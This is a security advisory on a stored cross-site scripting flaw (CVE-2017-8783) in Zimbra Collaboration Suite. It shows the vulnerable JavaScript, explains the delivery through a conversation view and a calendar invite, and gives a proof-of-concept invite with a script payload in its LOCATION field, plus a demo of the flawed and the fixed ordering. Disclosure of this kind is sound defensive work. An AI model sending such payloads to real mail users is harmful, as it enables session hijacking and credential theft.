Advisory

Stephan Kaag, April 2017

Cross-Site Scripting vulnerability in Zimbra Collaboration Suite

Abstract

A Cross-Site Scripting vulnerability was found in Zimbra Collaboration Suite (ZCS). This issue allows an attacker to perform a wide variety of actions, such as carrying out arbitrary actions on the victim's behalf or presenting a fake login screen to collect usernames and passwords. In order to exploit this issue, the attacker has to lure a victim into opening a specially crafted email in ZCS.

See also

- CVE-2017-8783
- Zimbra Collaboration 8.7.10 GA Release
- Persistent XSS - location
- Zimbra Collaboration - Security Vulnerability Advisories

Tested versions

This issue was successfully tested on ZCS 8.7.1_GA_1670 (build 20161025045142). It is, however, likely that this issue is present in all versions of ZCS from version 8.5.0 onwards.

Fix

The issue is fixed in Zimbra Collaboration Suite version 8.7.10.

Introduction

Zimbra is an enterprise-class email, calendar and collaboration solution built for the cloud, both public and private. It has a browser-based interface. It runs on any device: smartphone, tablet and desktop or laptop computer running Windows, Linux or OS X.

A Cross-Site Scripting vulnerability was found in Zimbra Collaboration Suite (ZCS). This issue allows an attacker to perform a wide variety of actions, such as carrying out arbitrary actions on the victim's behalf or presenting a fake login screen to collect usernames and passwords. In order to exploit this issue, the attacker has to lure a victim into opening a specially crafted email in ZCS.

Details

If an email is opened in the conversation view of the web interface, the body of the mail is loaded by ZCS. While doing so, it splits the message body into parts and, depending on the content type, tries to fetch the original content corresponding to the part it is processing. It uses the AjxStringUtil._getOriginalHtmlContent method in the AjxStringUtil.js file to do this.

The vulnerable code in the AjxStringUtil.js file is as follows:

AjxStringUtil._getOriginalHtmlContent = function(text) {

   // strip <script> tags (which should not be there)
   var htmlNode = AjxStringUtil._writeToTestIframeDoc(text);
   while (AjxStringUtil.SCRIPT_REGEX.test(text)) {
      text = text.replace(AjxStringUtil.SCRIPT_REGEX, "");
   }

   ...
}

AjxStringUtil._writeToTestIframeDoc = function(html) {
   var iframe;
   ...
   iframe = document.getElementById(AjxStringUtil.__curIframeId);
   var idoc = Dwt.getIframeDoc(iframe);
   idoc.open();
   idoc.write(html);
   idoc.close();
   ...
};

The text variable in the code above is written directly into a hidden iframe, and, as the order of the calls shows, this happens before the <script> tags are stripped from it. This variable can contain HTML originating from the email body. If an attacker includes a <script> tag in this HTML, it is executed in the context of the iframe. As a result, it is possible to interact with the ZCS interface through the window.parent property in JavaScript.
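The ordering defect described above, next to the ordering that strips first, as an added illustration that is not Zimbra's code. The hidden iframe is replaced by a recording sink, and SCRIPT_REGEX is an assumed stand-in, since the page does not show Zimbra's actual pattern:

```javascript
// Assumed stand-in for AjxStringUtil.SCRIPT_REGEX (Zimbra's real pattern is not on the page).
// Deliberately without the g flag: test()/replace() on a global regex would share lastIndex.
const SCRIPT_REGEX = /<script\b[^>]*>[\s\S]*?<\/script\s*>/i;

// Stand-in for the hidden test iframe: instead of a DOM document it records what was
// written and flags whether an intact <script> element ever reached the document sink.
function makeIframeSink() {
  const sink = { written: [], scriptReachedDocument: false };
  sink.write = function (html) {
    sink.written.push(html);
    if (SCRIPT_REGEX.test(html)) sink.scriptReachedDocument = true;
  };
  return sink;
}

// Same loop shape as the advisory's code: repeat until nothing matches, because a single
// pass can leave a tag behind when one <script> element was nested inside another.
function stripScripts(text) {
  while (SCRIPT_REGEX.test(text)) {
    text = text.replace(SCRIPT_REGEX, "");
  }
  return text;
}

// Mirrors the vulnerable ordering: the raw text hits the iframe document first, and
// only the local copy is cleaned afterwards.
function vulnerableGetOriginalHtmlContent(text, sink) {
  sink.write(text);
  return stripScripts(text);
}

// Corrected ordering: strip before anything is written to a live document.
function fixedGetOriginalHtmlContent(text, sink) {
  const cleaned = stripScripts(text);
  sink.write(cleaned);
  return cleaned;
}

// Constructed samples, shaped like the LOCATION field of the proof of concept.
const SAMPLE = "Room 4<script>window.parent.alert(1);</script>";
const NESTED = "Room 4<scr<script></script>ipt>window.parent.alert(1);</script>";

// Returns whether a script element reached the document under each ordering.
function demo() {
  const a = makeIframeSink(), b = makeIframeSink();
  vulnerableGetOriginalHtmlContent(SAMPLE, a);
  fixedGetOriginalHtmlContent(SAMPLE, b);
  return { vulnerable: a.scriptReachedDocument, fixed: b.scriptReachedDocument };
}

console.log(demo()); // { vulnerable: true, fixed: false }
```

Note that even the corrected ordering is only a tag blacklist; on a real page the document-write sink should additionally be a sandboxed iframe so that window.parent access is not available to whatever survives the regex.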

In order for an attacker to successfully exploit this issue, the victim needs to have ZCS configured to open email messages in the conversation view. Email messages are opened in this view when two or more mails have been received from the same sender; ZCS then regards them as a conversation.

First, the attacker sends a simple email to the victim.
Next, the attacker sends a calendar invite that meets the following specifications:
1. An arbitrary value in the DESCRIPTION field.
2. A value containing script code in the LOCATION field.

Together, these two messages form a conversation in the victim's ZCS environment. If the victim opens this conversation, the script code is executed.

Proof of concept

The following proof of concept email with a calendar invite can be used to demonstrate this issue:
---[snip]---
From: me@example.com
To: victim@example.com
Subject: Re: My message
MIME-Version: 1.0
Content-class: urn:content-classes:calendarmessage
Content-type: text/calendar; method=REQUEST; charset=UTF-8
Content-transfer-encoding: 8BIT
Date: Tue, 25 Apr 2017 06:21:52 +0000
   
BEGIN:VCALENDAR
METHOD:REQUEST
PRODID:-//My/Fun//EN
VERSION:2.0
BEGIN:VEVENT
ORGANIZER:mailto:u1@dom.loc
UID:2017042604
DTSTAMP:20170426T000000Z
DTSTART:20170426T160000Z
DTEND:20170426T170000Z
DESCRIPTION:desc
SUMMARY:summary
LOCATION:<script>window.parent.alert(1);</script>
END:VEVENT
END:VCALENDAR
---[snip]---

Below is a screenshot of the XSS in action:
/advisory/SFY20170409/poc.gif
